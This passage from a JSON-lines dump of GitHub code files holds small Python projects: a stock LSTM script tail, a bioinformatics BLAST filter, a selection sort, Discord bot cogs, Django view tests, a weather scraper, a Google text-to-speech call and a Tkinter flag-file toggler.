#data_df = pd.read_csv('GOOG_2015-04-01_2020-03-31.csv', index_col='Date', parse_dates=True)\n #using pandas_datareader library to get the data from Yahoo-Finance\n start_date = datetime(2015, 4, 2)\n end_date = datetime(2020, 3, 31)\n ticker = 'GOOG'\n \n data_df = pdr.get_data_yahoo(tickers=ticker, start=start_date, end=end_date)\n \n #Defining the initial parameters of the model \n params = get_params() \n \n #run() trains the LSTM on the historical close prices and returns the fitted model\n #here our aim is to build a model that predicts the future prices\n #this model will be saved for future use\n model = run(data_df, params) \n \n BASE_PATH = os.getcwd()\n script_folder = Path(os.getcwd())\n path = script_folder / 'model.h5'\n \n model.save(path)\n print(\"'model' is saved in the current directory for future use\")\n \n","repo_name":"revanth-talluri/Stock-Price-Prediction","sub_path":"4_building_model.py","file_name":"4_building_model.py","file_ext":"py","file_size_in_byte":4362,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4786856388","text":"import pandas as pd\nimport sys\n\ndef USAGE():\n print(\"%s InFile OutFile RefFile Num Identity MinLen MaxLen\"%sys.argv[0])\n\ndef Construct_Region(dat,id,st,end):\n if dat[st] < dat[end]:\n qst,qend = dat[st],dat[end] \n else:\n qst,qend = dat[end],dat[st]\n return(\"%s:%d-%d\"%(dat[id],qst,qend))\n\nif len(sys.argv) <3:\n USAGE()\n sys.exit(1)\n\ndef Cds2Group(x,search_d):\n #cds_nam = \"_\".join(x.split(\"_\")[0:2])\n group = search_d.get(x,\"Unknown\")\n return(group)\n\n\n\nprint(sys.argv)\n\nInFile = sys.argv[1]\nOutFile = sys.argv[2]\nRefFile = sys.argv[3]\nNum = int(sys.argv[4])\nIdentity = 95 if len(sys.argv) <6 else int(sys.argv[5])\nmin_len = 100 if len(sys.argv) <7 else int(sys.argv[6])\nmax_len = 1450 if len(sys.argv) <8 else int(sys.argv[7])\n\nRef = open(RefFile,\"r\")\ndat = Ref.readlines()\nRef.close()\ndat_list = [x.strip().split(\"\\t\") for x in dat]\ngroup_dict = dict(zip([x[1].split(\"|\")[1] for x in dat_list],[x[0] for x in dat_list]))\n\ncolname = [\"qseqid\",\"sseqid\",\"pident\",\"length\",\"mismatch\",\"gapopen\",\"qstart\",\"qend\",\"sstart\",\"send\",\"evalue\",\"bitscore\"]\ndf = pd.read_table(InFile,header=None,names=colname)\ndf.iloc[:,2:12] = df.iloc[:,2:12].astype(int)\n\ndf_con = df[(df[\"pident\"] >= Identity) &(df[\"length\"] >min_len)&(df[\"length\"] < max_len)]\ndf_con[\"qsp\"] = df_con[\"qseqid\"].apply(lambda x:group_dict.get(x.split(\"|\")[1],\"Unknown\"))\n\nall_sp = df_con[\"qsp\"].tolist()\ndf_con_new = df_con\n\ndf_con_new = df_con_new.reset_index().drop([\"index\"],axis=1)\n# region define\n#df_con[\"q-reg\"] = df_con.apply(lambda x:Construct_Region(x,\"qid\",\"qstart\",\"qend\"),axis=1)\ndf_con_new[\"s-reg\"] = df_con_new.apply(lambda x:Construct_Region(x,\"sseqid\",\"sstart\",\"send\"),axis=1)\ndf_con_re = (df_con_new.loc[:,\"s-reg\"]).to_frame(name=\"Uniq_reg\")\ndf_con_re.drop_duplicates(inplace=True) ## drop duplicated regions, keep the unique ones\n\n## reconstruct the region dataframe\ndf_con_re[\"ID\"] = df_con_re[\"Uniq_reg\"].apply(lambda x:x.split(\":\")[0])\ndf_con_re[\"start\"] = df_con_re[\"Uniq_reg\"].apply(lambda x:x.split(\":\")[1].split(\"-\")[0])\ndf_con_re[\"end\"] = df_con_re[\"Uniq_reg\"].apply(lambda 
x:x.split(\":\")[1].split(\"-\")[1])\ndf_con_re[\"length\"] = df_con_re.apply(lambda x:int(x[\"end\"]) - int(x[\"start\"]),axis=1)\ndf_con_re = df_con_re.reset_index().drop([\"index\"],axis=1)\ndf_con_re.iloc[:,2:] = df_con_re.iloc[:,2:].astype(int)\n\nref_dic = {}\nfor i in df_con_new.index:\n ref_key = df_con_new.loc[i,\"s-reg\"]\n if ref_key in ref_dic.keys():\n ref_dic[ref_key] = ref_dic[ref_key]+\",\"+df_con_new.loc[i,\"qsp\"]\n else:\n ref_dic[ref_key] = df_con_new.loc[i,\"qsp\"]\n\n\nnew_ref= {}\nfor k,v in ref_dic.items():\n ref_dic[k] = v.split(\",\")\n new_ref[k] = set(v.split(\",\"))\n\ndf_stat = pd.DataFrame(ref_dic.keys(),columns=[\"Ref_Gene\"])\nAll_sp_len = len(set(df_con_new[\"qsp\"]))\nfor i in df_stat.index:\n ref = df_stat.loc[i,\"Ref_Gene\"]\n df_stat.loc[i,\"Exist Num\"] = len(ref_dic[ref])\n df_stat.loc[i,\"Uni Num\"] = len(new_ref[ref])\ndf_stat[\"dup rate\"] = df_stat.apply(lambda x:round(int(x[\"Exist Num\"])/All_sp_len,3),axis=1)\ndf_stat[\"perc\"] = df_stat.apply(lambda x:round(int(x[\"Uni Num\"])/All_sp_len,3),axis=1)\ndf_stat = df_stat[df_stat[\"perc\"] > 0.1]\n\nSelectNum = Num if len(df_stat) >Num else len(df_stat)\ndf_final = df_stat.sort_values([\"perc\"],ascending=False)[:SelectNum]\n\ndf_final = pd.merge(df_final,df_con_re,left_on=\"Ref_Gene\",right_on=\"Uniq_reg\").drop([\"Uniq_reg\"],axis=1)\ndf_final.to_csv(OutFile,sep=\"\\t\",index=False)","repo_name":"zhengxingSong/BacteriaPrimer","sub_path":"GenusPrimer/bin/A1.1_Extract_Orth_GeneV3.py","file_name":"A1.1_Extract_Orth_GeneV3.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71229904488","text":"\ndef sort(numbers):\n for i in range(0, len(numbers)-1):\n for j in range(i+1, len(numbers)):\n if numbers[i] > numbers[j]:\n numbers[i], numbers[j] = numbers[j], numbers[i]\n\nnumbers = [25,2,8,-6,4,3,2]\nprint(\"Unsorted collection of numbers:{}\".format(numbers))\nsort(numbers)\nprint(\"Collection of numbers after applying the sorting algorithm:{}\".format(numbers))","repo_name":"lauracarpaciu/Algorithmic_Thinking","sub_path":"Algoritmi de sortare/Selection sort.py","file_name":"Selection sort.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9555279442","text":"#\n# This file is part of application-utility.\n#\n# application-utility is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# application-utility is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with application-utility. 
If not, see .\n#\n# Authors: fhdk\n#\n\n\"\"\"application-utility Text Module\"\"\"\n\nfrom application_utility.translation import i18n\n\n_ = i18n.language.gettext\n# gitlab\nGITLAB = \"https://gitlab.manjaro.org/\"\nOFFICIAL_ISO_URL = GITLAB + \"profiles-and-settings/iso-profiles/raw/manjaro-architect/manjaro\"\nCOMMUNITY_ISO_URL = GITLAB + \"profiles-and-settings/iso-profiles/raw/manjaro-architect/community\"\n# header\nMAM = _(\"Manjaro Application Maintenance\")\nMAU = _(\"Manjaro Application Utility\")\nSELECT_APPS = _(\"Select/Deselect apps you want to install/remove\")\nWHEN_READY = _(\"when ready\")\n# buttons\nBTN_ADVANCED = _(\"advanced\")\nBTN_ADVANCED_TIP = _(\"Toggle an extended selection of packages\")\nBTN_DOWNLOAD = _(\"download\")\nBTN_DOWNLOAD_TIP = _(\"Download the most recent selection of packages\")\nBTN_RESET = _(\"reset\")\nBTN_RESET_TIP = _(\"Reset your current selections...\")\nBTN_UPDATE_SYSTEM = _(\"UPDATE SYSTEM\")\nBTN_UPDATE_SYSTEM_TIP = _(\"Apply your current selections to the system\")\nBTN_CLOSE = _(\"close\")\nBTN_CLOSE_TIP = _(\"Discard selections and close app\")\n# tree view columns\nCOL_GROUP = _(\"Group\")\nCOL_APPLICATION = _(\"Application\")\nCOL_DESCRIPTION = _(\"Description\")\nCOL_ACTION = _(\"Install/Remove\")\nPKG_INSTALLED_TIP = _(\"Installed\")\nPKG_REMOVE_TIP = _(\"to remove\")\n# message\nSELECTION_RESET = _(\"Your selections has been reset\")\nDOWNLOAD_COMPLETE = _(\"App data has been downloaded and list is reset\")\nSYSTEM_UPDATED = _(\"Your system has been updated\")\nDOWNLOAD_NA = _(\"Download not available\")\nSERVER_NA = _(\"server could not be reached\")\n","repo_name":"fhdk/application-utility","sub_path":"application_utility/constants/txt.py","file_name":"txt.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1456555683","text":"'''\nCreated: 9/1/2018\nBy: Mason Seeger\n\nYASL - Yet Another Simple Language\n\nAs of now this program is a lexicon for a simple programming language.\n\nUsing Windows ctrl+z gives end of file\n'''\nimport sys\nfrom Scanner import Scanner\nfrom Token import Token\nfrom Parser import Parser\nfrom Interpreter import Interpreter\n\ndef eofFound(SC):\n if(SC.state==-10):\n return(-1)\n\ndef main():\n fileName = sys.argv[1]\n f = open(fileName, 'r')\n eof = 0\n\n try:\n SC = Scanner(f)\n parser = Parser(SC)\n program = parser.S()\n interpreter = Interpreter(program)\n interpreter.interpProgram()\n #program.display(0)\n\n except EOFError:\n eof = Token('EOF', ' ', [SC.position[0],1])\n\n if eof: #EOF found as the first thing in a line\n print(\"in eof\")\n if(SC.state ==-3):\n print(\"error, no */ found before EOF\")\n print(eof.information())\n elif not(parser.ok):\n print(\"error in the parser, currently an undefined identifier\")\n print(\"ending the program \")\n\n #print(parser.consts)\n\nif __name__ == '__main__':\n main()\n","repo_name":"masonseeger/YASL-Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70629136170","text":"from disnake import ApplicationCommandInteraction\nfrom disnake.ext import commands, tasks\nfrom config.messages import Messages\nfrom datetime import time, datetime\nimport os\nfrom dotenv import load_dotenv\n\nload_dotenv(dotenv_path=\"./config/.env\")\n\n\nclass Praying(commands.Cog):\n def __init__(self, bot: commands.Bot):\n 
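\"\"\"Keep a reference to the bot and start the scheduled daily prayer task.\"\"\"\n 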
self.bot = bot\n self.send_pray.start()\n\n local_tz = datetime.now().astimezone().tzinfo\n\n @commands.slash_command(description=Messages.pray_brief)\n async def pray(self, inter: ApplicationCommandInteraction):\n await inter.send(Messages.pray_string)\n\n @tasks.loop(time=time(int(os.getenv(\"PRAYING_HOUR\")), int(os.getenv(\"PRAYING_MINUTE\")), tzinfo=local_tz))\n async def send_pray(self):\n modlitebna = self.bot.get_channel(int(os.getenv(\"MODLITEBNA_ROOM\")))\n await modlitebna.send(Messages.pray_string)\n\n\ndef setup(bot: commands.Bot):\n bot.add_cog(Praying(bot))\n","repo_name":"lukynmatuska/Ministrant","sub_path":"cogs/praying.py","file_name":"praying.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19250913753","text":"\nfrom psyLex.readDict import *\nfrom psyLex.wordCount import *\nimport sys\n\n# It goes like this: accepts three command line arguments: (1) mode - see below - (2) text to analyze (file vs. raw text), and (3) the path to the dictionary file we should use.\ninMode = sys.argv[1]\ninValue = sys.argv[2]\ninDict = sys.argv[3]\n\ndictIn = readDict(inDict)\n\n# Currently supports two modes: basic text (entered as a command-line argument) and file-based (will read a whole frakin' file).\n# If basic text mode, just assign the input value the value of the second command line argument.\nif inMode == \"0\":\n inData = inValue\n# If file mode, read the file into a string.\nelif inMode == \"1\":\n with open (inValue, \"r\") as myfile:\n inData=myfile.read().replace('\\n', ' ')\n\n# Run the wordCount function using the specified parameters.\nout = wordCount(inData, dictIn)\n\n#print(out[0].items())\n\nfor k, v in out[0].items():\n\tprint(k + \": \" + str(v))\n","repo_name":"seanrife/psyLex","sub_path":"psyLex.py","file_name":"psyLex.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"38401542857","text":"\nimport os\nfrom google.cloud import texttospeech\n# Add your google api authentication credentials\ncredential_path=\"/Users/revanthbn/OneDrive/MentalHealthTracker/My-First-Project-5928deb2c80b.json\"\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = credential_path\n# Instantiates a client\nclient = texttospeech.TextToSpeechClient()\n\n# Set the text input to be synthesized\nsynthesis_input = texttospeech.SynthesisInput(text=\"I feel like a burden. I feel lonely. I’m not doing very well. I miss my family. 
\")\n\n# Build the voice request, select the language code (\"en-US\") and the ssml\n# voice gender (\"neutral\")\nvoice = texttospeech.VoiceSelectionParams(\n language_code=\"en-UK\", ssml_gender=texttospeech.SsmlVoiceGender.FEMALE\n)\n\n# Select the type of audio file you want returned\naudio_config = texttospeech.AudioConfig(\n audio_encoding=texttospeech.AudioEncoding.MP3\n)\n\n# Perform the text-to-speech request on the text input with the selected\n# voice parameters and audio file type\nresponse = client.synthesize_speech(\n input=synthesis_input, voice=voice, audio_config=audio_config\n)\n# See if there's a way to integrate the response directly\n# The response's audio_content is binary.\nwith open(\"alexa1.mp3\", \"wb\") as out:\n # Write the response to the output file.\n out.write(response.audio_content)\n print('Audio content written to file \"output.mp3\"')\n","repo_name":"rehanayub10/MedHacks2020","sub_path":"text_to_speech.py","file_name":"text_to_speech.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3973034547","text":"import shutil\nimport tempfile\n\nfrom django import forms\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.core.cache import cache\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom django.test import Client, TestCase, override_settings\nfrom django.urls import reverse\n\nfrom yatube.settings import POST_PER_PAGE\n\nfrom ..forms import CommentForm\nfrom ..models import Comment, Follow, Group, Post\n\nUser = get_user_model()\nPOSTS = 13\nSECOND_PAGE_POSTS = 3\nTEMP_MEDIA_ROOT = tempfile.mkdtemp(dir=settings.BASE_DIR)\n\n\n@override_settings(MEDIA_ROOT=TEMP_MEDIA_ROOT)\nclass ViewsTests(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.user = User.objects.create_user(username='NoNameAuthor')\n cls.user_follower = User.objects.create_user(username='Follower')\n cls.user_following = User.objects.create_user(username='Following')\n cls.group = Group.objects.create(\n title='Тестовая группа',\n slug='test_slug',\n description='Тестовое описание'\n )\n cls.index = reverse('posts:index')\n cls.group_list = reverse('posts:group_posts', kwargs={\n 'slug': 'test_slug'\n })\n cls.profile = reverse('posts:profile', kwargs={\n 'username': 'NoNameAuthor'\n })\n cls.post_detail = reverse('posts:post_detail', kwargs={'post_id': '1'})\n cls.post_create = reverse('posts:post_create')\n cls.post_edit = reverse('posts:post_edit', kwargs={'post_id': '1'})\n cls.follow_index = reverse('posts:follow_index')\n cls.small_gif = (\n b'\\x47\\x49\\x46\\x38\\x39\\x61\\x02\\x00'\n b'\\x01\\x00\\x80\\x00\\x00\\x00\\x00\\x00'\n b'\\xFF\\xFF\\xFF\\x21\\xF9\\x04\\x00\\x00'\n b'\\x00\\x00\\x00\\x2C\\x00\\x00\\x00\\x00'\n b'\\x02\\x00\\x01\\x00\\x00\\x02\\x02\\x0C'\n b'\\x0A\\x00\\x3B'\n )\n cls.uploaded = SimpleUploadedFile(\n name='small.gif',\n content=cls.small_gif,\n content_type='image/gif',\n )\n cls.post = Post.objects.create(\n author=cls.user,\n text='Тестовый пост',\n group=cls.group,\n image=cls.uploaded,\n )\n cls.post_to_follow = Post.objects.create(\n author=cls.user_following,\n text='Пост для проверки подписок',\n )\n cls.true_group = Group.objects.create(\n title='Тестовая группа2',\n slug='test_slug2',\n description='Тестовое описание2',\n )\n cls.follow = Follow.objects.create(\n user=cls.user,\n author=cls.post.author\n )\n cls.comment = Comment.objects.create(\n 
post=cls.post,\n author=cls.user,\n text='Комментарий'\n )\n\n @classmethod\n def tearDownClass(cls):\n super().tearDownClass()\n shutil.rmtree(TEMP_MEDIA_ROOT, ignore_errors=True)\n\n def setUp(self):\n self.guest_client = Client()\n self.authorized_client = Client()\n self.authorized_client.force_login(self.user)\n self.user_follower_client = Client()\n self.user_follower_client.force_login(self.user_follower)\n self.user_following_client = Client()\n self.user_following_client.force_login(self.user_following)\n cache.clear()\n\n def test_index_correct_context(self):\n \"\"\"Check the context of the index template.\"\"\"\n response = self.authorized_client.get(self.index)\n self.assertEqual(response.context['post'], self.post)\n\n def test_group_posts_correct_context(self):\n \"\"\"Check the context of the group_posts template.\"\"\"\n response = self.authorized_client.get(self.group_list)\n self.assertEqual(response.context['post'], self.post)\n self.assertEqual(response.context['group'], self.group)\n\n def test_profile_correct_context(self):\n \"\"\"Check the context of the profile template.\"\"\"\n response = self.authorized_client.get(self.profile)\n self.assertEqual(response.context['post'], self.post)\n self.assertEqual(response.context['author'], self.user)\n self.assertTrue(response.context['following'], self.follow)\n\n def test_post_detail_correct_context(self):\n \"\"\"Check the context of the post_detail template.\"\"\"\n response = self.authorized_client.get(self.post_detail)\n self.assertEqual(response.context['post'], self.post)\n self.assertTrue(response.context['comments'], self.comment)\n self.assertTrue(response.context['form'], CommentForm())\n\n def test_follow_index_correct_context(self):\n \"\"\"Check the context of the follow_index template.\"\"\"\n response = self.authorized_client.get(self.follow_index)\n self.assertEqual(response.context['post'], self.post)\n\n def test_post_edit_correct_context(self):\n \"\"\"Check the context of the post_edit template.\"\"\"\n form_fields = [\n (\n 'text',\n forms.fields.CharField,\n self.authorized_client.get(self.post_edit)\n ),\n (\n 'group',\n forms.fields.ChoiceField,\n self.authorized_client.get(self.post_edit)\n ),\n (\n 'image',\n forms.fields.ImageField,\n self.authorized_client.get(self.post_edit)\n ),\n (\n 'text',\n forms.fields.CharField,\n self.authorized_client.get(self.post_create)\n ),\n (\n 'group',\n forms.fields.ChoiceField,\n self.authorized_client.get(self.post_create)\n ),\n (\n 'image',\n forms.fields.ImageField,\n self.authorized_client.get(self.post_create)\n )\n ]\n for value, expected, response in form_fields:\n with self.subTest(value=value):\n form_field = response.context.get('form').fields.get(value)\n self.assertIsInstance(form_field, expected)\n\n def test_post_in_true_group(self):\n \"\"\"\n Check that the post is attached to the correct group.\n \"\"\"\n response = self.authorized_client.get(\n reverse('posts:group_posts',\n args=[self.true_group.slug]))\n self.assertNotIn(self.post, response.context['page_obj'])\n\n def test_add_posts_comment(self):\n \"\"\"\n Check adding a comment.\n \"\"\"\n comment_count = Comment.objects.count()\n new_comment = {\n 'text': 'text-test'\n }\n self.authorized_client.post(\n reverse('posts:add_comment', args=[self.post.id]),\n data=new_comment,\n follow=True,\n )\n self.assertEqual(Comment.objects.count(), comment_count + 1)\n self.assertTrue(\n Comment.objects.filter(\n text='Комментарий',\n author=self.user,\n ).exists()\n )\n\n def test_guest_client_cant_comment(self):\n \"\"\"\n An unauthorized 
user cannot post comments.\n \"\"\"\n comment_count = Comment.objects.count()\n new_comment = {\n 'text': 'text-test'\n }\n response = self.guest_client.post(\n reverse('posts:add_comment', args=[self.post.id]),\n data=new_comment,\n follow=True,\n )\n self.assertEqual(Comment.objects.count(), comment_count)\n self.assertRedirects(\n response,\n f'/auth/login/?next=/posts/{self.post.id}/comment/'\n )\n\n def test_cache_index(self):\n \"\"\"Check the cache of the main page.\"\"\"\n post_1 = Post.objects.create(\n author=self.user,\n text='Тестовый пост_1',\n group=self.group\n )\n response_1 = self.authorized_client.get(self.index)\n Post.objects.filter(pk=post_1.id).delete()\n response_2 = self.authorized_client.get(self.index)\n self.assertEqual(response_1.content, response_2.content)\n cache.clear()\n response_3 = self.authorized_client.get(self.index)\n self.assertNotEqual(response_2.content, response_3.content)\n\n def test_follow(self):\n \"\"\"Check following an author.\"\"\"\n Follow.objects.create(\n user=self.user_follower,\n author=self.user_following\n )\n response = self.user_follower_client.get(self.follow_index)\n self.assertEqual(\n response.context['page_obj'][0].text,\n self.post_to_follow.text\n )\n response_2 = self.user_following_client.get(self.follow_index)\n self.assertNotEqual(response_2, self.post_to_follow.text)\n\n def test_unfollow(self):\n \"\"\"Check unfollowing an author.\"\"\"\n Follow.objects.create(\n user=self.user_follower,\n author=self.user_following\n )\n response = self.user_follower_client.get(\n reverse(\n 'posts:profile_unfollow',\n kwargs={'username': self.user_following}\n )\n )\n follow = None\n self.assertEqual(response.context, follow)\n\n def test_new_post_in_follow_user(self):\n \"\"\"\n Check that a new post by an author appears for that author's followers.\n \"\"\"\n Follow.objects.create(\n user=self.user_follower,\n author=self.user_following\n )\n response = self.user_follower_client.get(self.follow_index)\n self.assertEqual(\n response.context['page_obj'][0].text,\n self.post_to_follow.text\n )\n\n def test_new_post_in_ufollow_user(self):\n \"\"\"\n Check that a new post does not appear for users who do not follow the author.\n \"\"\"\n Follow.objects.create(\n user=self.user_follower,\n author=self.user_following\n )\n response = self.user_following_client.get(self.follow_index)\n self.assertNotEqual(\n response.context,\n self.post_to_follow\n )\n\n\nclass PaginatorViewsTest(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.authorized_author = Client()\n cls.author = User.objects.create_user(username='NoName')\n cls.group = Group.objects.create(\n title='test_title',\n description='test_description',\n slug='test-slug'\n )\n cache.clear()\n\n def setUp(self):\n for post_temp in range(POSTS):\n Post.objects.create(\n text=f'text{post_temp}', author=self.author, group=self.group\n )\n\n def test_first_page_contains_ten_records(self):\n templates_pages_names = {\n 'posts/index.html': reverse('posts:index'),\n 'posts/group_posts.html':\n reverse('posts:group_posts', kwargs={'slug': self.group.slug}),\n 'posts/profile.html':\n reverse('posts:profile', kwargs={'username': self.author}),\n }\n for template, reverse_name in templates_pages_names.items():\n with self.subTest(reverse_name=reverse_name):\n response = self.client.get(reverse_name)\n self.assertEqual(\n len(response.context['page_obj']), POST_PER_PAGE\n )\n\n def test_second_page_contains_three_records(self):\n templates_pages_names = {\n 'posts/index.html': 
reverse('posts:index') + '?page=2',\n 'posts/group_posts.html':\n reverse('posts:group_posts',\n kwargs={'slug': self.group.slug}) + '?page=2',\n 'posts/profile.html':\n reverse('posts:profile',\n kwargs={'username': self.author}) + '?page=2',\n }\n for template, reverse_name in templates_pages_names.items():\n with self.subTest(reverse_name=reverse_name):\n response = self.client.get(reverse_name)\n self.assertEqual(len(\n response.context['page_obj']), SECOND_PAGE_POSTS\n )\n","repo_name":"kirillkutsko/hw05_final","sub_path":"yatube/posts/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":12700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15059242776","text":"import pandas as pd\nimport numpy as np \nimport datetime\nimport urllib.request\nimport json\nfrom bs4 import BeautifulSoup\n# UDF \nfrom script.utility_data_IO import * \n#from script.utility_operation import * \n#import utility_data_IO\n\ncols = ['Mean Temperature', 'Max Temperature', 'Min Temperature',\n 'Heating Degree Days', 'Dew Point', 'Average Humidity',\n 'Maximum Humidity', 'Minimum Humidity', 'Precipitation',\n 'Sea Level Pressure', 'Wind Speed', 'Max Wind Speed', 'Max Gust Speed',\n 'Visibility', 'Events', 'timestamp']\n\ndef col_fix(df):\n for col in cols:\n if col in df.columns:\n pass\n else:\n df[col] = None \n return df \n\ndef main_(start_date,end_date):\n output=pd.DataFrame([])\n # -------------\n print ('-----------------')\n print ('start_date : ',start_date )\n print ('end_date : ',end_date )\n print ('-----------------')\n for day in pd.date_range(start=start_date, end=end_date, freq='D'):\n #for day in pd.date_range(start_date='3/1/2017', end_date='3/5/2017', freq='D'):\n print ((day))\n date_ = str(day).split(' ')[0] \n year_ = date_.split('-')[0]\n month_ = date_.split('-')[1]\n day_ = date_.split('-')[2]\n # -------------\n url_new = 'https://www.wunderground.com/history/airport/EGMC/{}/{}/{}/DailyHistory.html?cm_ven=localwx_history'.format(year_,month_,day_)\n print (url_new)\n \n # query the page \n opener=urllib.request.build_opener()\n opener.addheaders = [('User-agent', 'Mozilla/5.0')]\n page = opener.open(url_new)\n soup = BeautifulSoup(page, 'html.parser')\n trs = soup.find_all('td', attrs={'class': 'indent'})\n col=[]\n val=[]\n for tr in trs:\n if tr.text in cols:\n tds = tr.find_next_siblings(\"td\") # you get list\n print (tr.text )\n col.append(tr.text)\n print (tds[0].text)\n val.append(tds[0].text.strip('\\n')\n .replace('\\xa0','')\n .replace('°C','')\n .replace('mm','')\n .replace('hPa','')\n .replace('km/h\\n ()','')\n .replace('km/h','')\n .replace('kilometers','')\n .replace('\\n\\t', '')\n .replace('\\t', '')\n .replace('\\n', '')\n .replace('- ()', ''))\n #.replace(' -', ''))\n else:\n col.append(tr.text) \n val.append(None) \n\n df = pd.DataFrame({'col':col,'val':val}).set_index('col').T.reset_index()\n df['timestamp'] = day \n del df['index']\n df = col_fix(df)\n print ('df.columns : ' , df.columns )\n print ('cols : ' , cols )\n #df.columns = cols \n df = df[cols] \n ### update output dataframe \n output = output.append(df)\n output = output.reset_index()\n print (output)\n del output['index']\n # fix column name \n output.columns = ['mean_temperature','max_temperature', 'min_temperature',\n 'heating_degree_days', 'dew_point', 'avg_humidity',\n 'max_humidity', 'min_humidity', 'precipitation',\n 'sea_level_pressure', 'wind_speed', 'max_wind_speed', 'max_gust_speed',\n 'visibility', 'events', 'timestamp']\n # 
re-order columns \n output = output[['timestamp','mean_temperature','max_temperature', 'min_temperature',\n 'heating_degree_days', 'dew_point', 'avg_humidity','max_humidity', 'min_humidity', 'precipitation',\n 'sea_level_pressure', 'wind_speed', 'max_wind_speed', 'max_gust_speed',\n 'visibility','events']]\n # clean data \n output=output.replace(' -', np.nan)\n print (output)\n return output \n\nif __name__ == '__main__':\n df_ = main_('1/1/2016', '12/31/2017')\n # dump to DB \n write_data_to_db(df_, 'weather_ldn',db_url)\n","repo_name":"yennanliu/web_scraping","sub_path":"legacy_project/weather_scrapper/LDN_weather_scrapper_V1.py","file_name":"LDN_weather_scrapper_V1.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"15173825909","text":"import Tkinter\r\nimport os\r\n\r\ntk = Tkinter.Tk()\r\ntk.title(\"flags\")\r\ntk.geometry(\"300x100\")\r\ntk.resizable(False, False)\r\n\r\nd = {}\r\nwith open(\"flags.txt\") as f:\r\n for line in f:\r\n if len(line) != 1:\r\n try:\r\n (key, val) = line.split(',')\r\n d[key] = val.rstrip()\r\n except ValueError:\r\n print(\"Warning: Max of two columns, lines removed\")\r\n\r\ndef dropdown(active_value):\r\n global active\r\n active = d[active_value]\r\n button_drop[\"state\"] = \"normal\"\r\n button_del[\"state\"] = \"normal\"\r\n button_drop.config(text = \"Drop {} flag\".format(active))\r\n button_del.config(text = \"Delete {} flag\".format(active))\r\n\r\n\r\ndef dropflag():\r\n try:\r\n open(active, 'a').close()\r\n except NameError:\r\n print(\"Select an option\")\r\n\r\ndef delflag():\r\n try:\r\n os.remove(active)\r\n except NameError:\r\n print(\"Select an option\")\r\n except WindowsError:\r\n print(\"File not found\")\r\n \r\nvar = Tkinter.StringVar()\r\nvar.set('Version')\r\n\r\np = Tkinter.OptionMenu(tk, var, *d, command=dropdown)\r\np.pack()\r\nbutton_drop = Tkinter.Button(command=dropflag)\r\nbutton_del= Tkinter.Button(command=delflag)\r\nbutton_drop[\"state\"] = \"disabled\"\r\nbutton_del[\"state\"] = \"disabled\"\r\nbutton_drop.pack()\r\nbutton_del.pack()\r\n\r\ntk.mainloop()","repo_name":"charlesmclement/flags","sub_path":"flags.py","file_name":"flags.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10303397991","text":"from io import BytesIO\nfrom math import floor\nfrom typing import Optional\n\nimport discord\nfrom PIL import Image\nfrom redbot.core import commands\n\nWIDE_HEIGHT = 48\n\n\nclass CrowWide(commands.Cog):\n @commands.command()\n async def wide(\n self,\n ctx: commands.Context,\n emoji: discord.PartialEmoji,\n size: float = 3.0,\n channel: Optional[discord.TextChannel] = None,\n ):\n \"\"\"owo\"\"\"\n\n if size < 0.05 or size > 20:\n await ctx.react_quietly(\"🚷\")\n return\n\n if size >= 1.0:\n width = floor(WIDE_HEIGHT * size)\n height = WIDE_HEIGHT\n else:\n # 🐇🥚🤫\n width = WIDE_HEIGHT\n height = floor(WIDE_HEIGHT / size)\n\n emoji_data = BytesIO(await emoji.read())\n resized_file = self._resize_image(emoji_data, width, height)\n file = discord.File(resized_file, filename=f\"{emoji.name}_wide.png\")\n\n if channel:\n await channel.send(file=file)\n else:\n await ctx.send(file=file)\n\n def _resize_image(self, image_data: BytesIO, width: int, height: int):\n out = BytesIO()\n with Image.open(image_data) as img:\n resized = img.resize((width, height))\n resized.save(out, format=\"PNG\")\n out.seek(0)\n return 
